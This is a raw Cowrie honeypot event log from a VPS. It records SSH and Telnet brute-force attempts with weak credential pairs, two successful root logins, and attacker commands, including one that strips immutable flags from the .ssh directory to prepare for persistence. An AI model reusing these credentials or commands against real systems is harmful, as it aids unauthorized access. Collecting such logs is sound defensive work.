{"eventid":"cowrie.login.failed","username":"test3","password":"password","message":"login attempt [test3/password] failed","sensor":"my-vps","timestamp":"2025-08-31T06:00:20.620363Z","src_ip":"212.227.235.229","session":"8d4b04c87c37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35355,"dst_ip":"1.2.3.4","dst_port":23,"session":"5467969dcad5","protocol":"telnet","message":"New connection: 212.227.235.229:35355 (1.2.3.4:23) [session: 5467969dcad5]","sensor":"my-vps","timestamp":"2025-08-31T06:00:21.450313Z"}
{"eventid":"cowrie.session.closed","duration":0.001527547836303711,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:00:21.451755Z","src_ip":"212.227.235.229","session":"5467969dcad5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39591,"dst_ip":"1.2.3.4","dst_port":23,"session":"0e7a9007c604","protocol":"telnet","message":"New connection: 212.227.235.229:39591 (1.2.3.4:23) [session: 0e7a9007c604]","sensor":"my-vps","timestamp":"2025-08-31T06:00:21.758086Z"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:00:22.415910Z","src_ip":"212.227.235.229","session":"8d4b04c87c37"}
{"eventid":"cowrie.session.closed","duration":3.002898693084717,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:00:24.760910Z","src_ip":"212.227.235.229","session":"0e7a9007c604"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":42644,"dst_ip":"1.2.3.4","dst_port":22,"session":"3cd50c7ed7cc","protocol":"ssh","message":"New connection: 43.159.36.188:42644 (1.2.3.4:22) [session: 3cd50c7ed7cc]","sensor":"my-vps","timestamp":"2025-08-31T06:00:31.061962Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:00:31.062896Z","src_ip":"43.159.36.188","session":"3cd50c7ed7cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:00:31.308514Z","src_ip":"43.159.36.188","session":"3cd50c7ed7cc"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle2025","message":"login attempt [oracle/oracle2025] failed","sensor":"my-vps","timestamp":"2025-08-31T06:00:32.333616Z","src_ip":"43.159.36.188","session":"3cd50c7ed7cc"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:00:33.581966Z","src_ip":"43.159.36.188","session":"3cd50c7ed7cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48340,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee1ef7500a9b","protocol":"ssh","message":"New connection: 212.227.125.160:48340 (1.2.3.4:22) [session: ee1ef7500a9b]","sensor":"my-vps","timestamp":"2025-08-31T06:00:34.784751Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:00:35.353596Z","src_ip":"212.227.125.160","session":"ee1ef7500a9b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:00:35.354310Z","src_ip":"212.227.125.160","session":"ee1ef7500a9b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36688,"dst_ip":"1.2.3.4","dst_port":22,"session":"72426afb91f7","protocol":"ssh","message":"New connection: 212.227.235.229:36688 (1.2.3.4:22) [session: 72426afb91f7]","sensor":"my-vps","timestamp":"2025-08-31T06:00:36.541785Z"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@WSX","message":"login attempt [root/1qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:00:37.001843Z","src_ip":"212.227.235.229","session":"a802118dae3c"}
{"eventid":"cowrie.login.failed","username":"test3","password":"password","message":"login attempt [test3/password] failed","sensor":"my-vps","timestamp":"2025-08-31T06:00:37.758095Z","src_ip":"212.227.125.160","session":"ee1ef7500a9b"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:00:39.275154Z","src_ip":"212.227.125.160","session":"ee1ef7500a9b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:00:43.364811Z","src_ip":"212.227.125.160","session":"5ec5910e20e6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:00:43.365473Z","src_ip":"212.227.125.160","session":"5ec5910e20e6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:00:44.452302Z","src_ip":"212.227.235.229","session":"72426afb91f7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:00:44.453478Z","src_ip":"212.227.235.229","session":"72426afb91f7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"5.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:00:48.805555Z","src_ip":"212.227.125.160","session":"5ec5910e20e6"}
{"eventid":"cowrie.session.closed","duration":"112.0","message":"Connection lost after 112.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:00:48.836285Z","src_ip":"212.227.125.160","session":"5ec5910e20e6"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy","message":"login attempt [deploy/deploy] failed","sensor":"my-vps","timestamp":"2025-08-31T06:00:49.118801Z","src_ip":"212.227.125.160","session":"2bc1291cafa6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:00:50.408291Z","src_ip":"212.227.235.229","session":"a802118dae3c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:00:50.409039Z","src_ip":"212.227.235.229","session":"a802118dae3c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42830,"dst_ip":"1.2.3.4","dst_port":22,"session":"dee8c6f7d696","protocol":"ssh","message":"New connection: 212.227.235.229:42830 (1.2.3.4:22) [session: dee8c6f7d696]","sensor":"my-vps","timestamp":"2025-08-31T06:00:53.232111Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:00:53.234497Z","src_ip":"212.227.235.229","session":"dee8c6f7d696"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:00:53.493816Z","src_ip":"212.227.235.229","session":"dee8c6f7d696"}
{"eventid":"cowrie.login.failed","username":"psn","password":"psn","message":"login attempt [psn/psn] failed","sensor":"my-vps","timestamp":"2025-08-31T06:00:54.562844Z","src_ip":"212.227.235.229","session":"dee8c6f7d696"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:00:55.823310Z","src_ip":"212.227.235.229","session":"dee8c6f7d696"}
{"eventid":"cowrie.session.closed","duration":"71.2","message":"Connection lost after 71.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:00:57.018900Z","src_ip":"212.227.125.160","session":"2bc1291cafa6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"6.7","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:00:57.076063Z","src_ip":"212.227.235.229","session":"a802118dae3c"}
{"eventid":"cowrie.session.closed","duration":"104.8","message":"Connection lost after 104.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:00:57.077083Z","src_ip":"212.227.235.229","session":"a802118dae3c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60146,"dst_ip":"1.2.3.4","dst_port":22,"session":"8707c9b20408","protocol":"ssh","message":"New connection: 212.227.235.229:60146 (1.2.3.4:22) [session: 8707c9b20408]","sensor":"my-vps","timestamp":"2025-08-31T06:01:05.276778Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:01:05.277621Z","src_ip":"212.227.235.229","session":"8707c9b20408"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:01:05.548930Z","src_ip":"212.227.235.229","session":"8707c9b20408"}
{"eventid":"cowrie.login.failed","username":"ankur","password":"ankur123","message":"login attempt [ankur/ankur123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:01:06.675156Z","src_ip":"212.227.235.229","session":"8707c9b20408"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:01:07.949655Z","src_ip":"212.227.235.229","session":"8707c9b20408"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy","message":"login attempt [deploy/deploy] failed","sensor":"my-vps","timestamp":"2025-08-31T06:01:11.597473Z","src_ip":"212.227.235.229","session":"72426afb91f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37042,"dst_ip":"1.2.3.4","dst_port":22,"session":"616c7a859410","protocol":"ssh","message":"New connection: 212.227.235.229:37042 (1.2.3.4:22) [session: 616c7a859410]","sensor":"my-vps","timestamp":"2025-08-31T06:01:12.559871Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:01:13.406438Z","src_ip":"212.227.235.229","session":"616c7a859410"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:01:13.407145Z","src_ip":"212.227.235.229","session":"616c7a859410"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45630,"dst_ip":"1.2.3.4","dst_port":22,"session":"08026bf45dae","protocol":"ssh","message":"New connection: 212.227.125.160:45630 (1.2.3.4:22) [session: 08026bf45dae]","sensor":"my-vps","timestamp":"2025-08-31T06:01:17.600010Z"}
{"eventid":"cowrie.session.closed","duration":"42.0","message":"Connection lost after 42.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:01:18.572493Z","src_ip":"212.227.235.229","session":"72426afb91f7"}
{"eventid":"cowrie.login.failed","username":"test3","password":"password1","message":"login attempt [test3/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T06:01:18.949428Z","src_ip":"212.227.235.229","session":"616c7a859410"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:01:20.855024Z","src_ip":"212.227.235.229","session":"616c7a859410"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36184,"dst_ip":"1.2.3.4","dst_port":22,"session":"912d4d109f5e","protocol":"ssh","message":"New connection: 212.227.235.229:36184 (1.2.3.4:22) [session: 912d4d109f5e]","sensor":"my-vps","timestamp":"2025-08-31T06:01:24.397973Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:01:24.398951Z","src_ip":"212.227.235.229","session":"912d4d109f5e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:01:24.685372Z","src_ip":"212.227.235.229","session":"912d4d109f5e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:01:25.313538Z","src_ip":"212.227.125.160","session":"08026bf45dae"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:01:25.314409Z","src_ip":"212.227.125.160","session":"08026bf45dae"}
{"eventid":"cowrie.login.success","username":"root","password":"090909","message":"login attempt [root/090909] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:01:25.871074Z","src_ip":"212.227.235.229","session":"912d4d109f5e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:01:26.459020Z","src_ip":"212.227.235.229","session":"912d4d109f5e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:01:26.459738Z","src_ip":"212.227.235.229","session":"912d4d109f5e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:01:26.460864Z","src_ip":"212.227.235.229","session":"912d4d109f5e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:01:26.747983Z","src_ip":"212.227.235.229","session":"912d4d109f5e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:01:27.379989Z","src_ip":"212.227.235.229","session":"912d4d109f5e"}
